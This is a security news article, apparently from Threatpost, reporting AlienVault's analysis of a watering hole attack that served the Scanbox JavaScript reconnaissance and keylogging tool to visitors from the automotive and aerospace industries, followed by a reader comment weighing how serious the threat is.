Watering Hole Attack Targets Automotive, Aerospace Industries

Watering Hole Attack

A new watering hole attack is targeting the aerospace, automotive and manufacturing industries with a new reconnaissance malware tool called “Scanbox.”

Attackers managed to load malware onto the website of a prominent company involved in the development of simulation and systems engineering software widely used within the automotive, aerospace and manufacturing industries.

These types of attacks are referred to as watering holes because, like a predator waiting passively near a water source to ambush prey, attackers compromise a site likely frequented by their intended victim. When the target visits the compromised site, he is infected with malware designed to pilfer intellectual property or establish a presence within a targeted network.

According to an Alien Vault report penned by Jaimie Blasco, attackers compromised the unnamed website with a string of code that would load a malicious Javascript file onto the machines of visitors from a remote server. Contained within that file is a reconnaissance tool known as “Scanbox.”

After infection, Blacsco writes that Scanbox checks the compromised machine for the website referer, User-Agent, Location, Cookie, Title (to identify specific content that the victim is visiting), Domain, CharsetScreen, width and height, Operating System, and Language. Before transmitting this data along to the command and control server, Scanbox encodes and encrypts the acquired data.

Blasco says the recon tool also contains a number of additional plugins designed to steal other valuable data.

One plugin checks to see which software – security software in particular – and what version of Microsoft’s enhanced mitigation experience toolkit are present on an infected machine. Other plugins enumerate Adobe Flash, Microsoft Office, Adobe Reader and Java versions respectively. Yet another plugin is a Javascript based keylogger.

“While the user is browsing the compromised website, all keystrokes are being recorded and sent to the C&C periodically,” Blasco writes. “It will also send keystrokes when the user submits web forms that can potentially include passwords and other sensitive data.”

Suggested articles

Discussion

  • redwolfe_98 on

    at first, i thought this "threat" sounded serious, but, on second thought, it doesn't seem like it can do much.. yea, if it happens to be loaded and running while you are logging into your bank account, it could be an issue.. but i am thinking that since it doesn't actually install any files, there might not be much to it.. also, since it is javascript from a third-party website, i am thinking that, maybe, if scripting is disabled, it won't be able to do anything.. also, the alienvault article gave the impression that, someone, a vulnerability in "silverlight" was involved.. so, if one doesn't have "silverlight" installed, that may also mitigate the threat.. otherwise, it is just collecting data that probably is sent in TCP packets every time that we connect to a website, like browser, OS, etc..

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.